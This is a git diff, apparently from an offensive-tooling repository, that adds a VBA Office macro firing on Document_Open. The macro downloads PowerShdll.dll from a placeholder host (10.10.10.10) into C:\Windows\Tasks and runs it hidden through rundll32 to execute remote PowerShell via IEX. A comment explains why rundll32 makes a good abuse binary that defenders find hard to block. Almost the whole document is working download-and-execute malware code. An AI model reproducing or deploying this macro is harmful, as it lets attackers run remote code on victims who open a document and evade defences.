nani1337 · December 21, 2022 00:36 · Jul 31, 2018 · Jul 31, 2018
diff --git a/macro_download_and_execute_rundll32_powershdll_powershell.vba b/macro_download_and_execute_rundll32_powershdll_powershell.vba
@@ -3,6 +3,9 @@
 '
 ' PowerShdll.dll by @p3nt4
 ' https://github.com/p3nt4/PowerShdll
+'
+' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
+' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)
 
 Sub Document_Open()
 Dim WinHttpReq As Object

diff --git a/macro_download_and_execute_rundll32_powershdll_powershell.vba b/macro_download_and_execute_rundll32_powershdll_powershell.vba
@@ -0,0 +1,32 @@
+' based on
+' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
+'
+' PowerShdll.dll by @p3nt4
+' https://github.com/p3nt4/PowerShdll
+
+Sub Document_Open()
+Dim WinHttpReq As Object
+Dim oStream As Object
+Dim myURL As String
+Dim LocalFilePath As String
+
+myURL = "http://10.10.10.10/Powershdll.dll"
+LocalFilePath = "C:\Windows\Tasks\Powershdll.dll"
+
+Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
+WinHttpReq.Open "GET", myURL, False, "", ""  '("username", "password")
+WinHttpReq.send
+
+If WinHttpReq.Status = 200 Then
+    Set oStream = CreateObject("ADODB.Stream")
+    oStream.Open
+    oStream.Type = 1
+    oStream.Write WinHttpReq.responseBody
+    oStream.SaveToFile LocalFilePath, 2 ' 1 = no overwrite, 2 = overwrite
+    oStream.Close
+End If
+
+Dim ExecFile As Double
+    ExecFile = Shell("rundll32 C:\Windows\Tasks\Powershdll.dll,main . IEX (iwr -useb http://10.10.10.10/encoded.txt)", vbHide)
+
+End Sub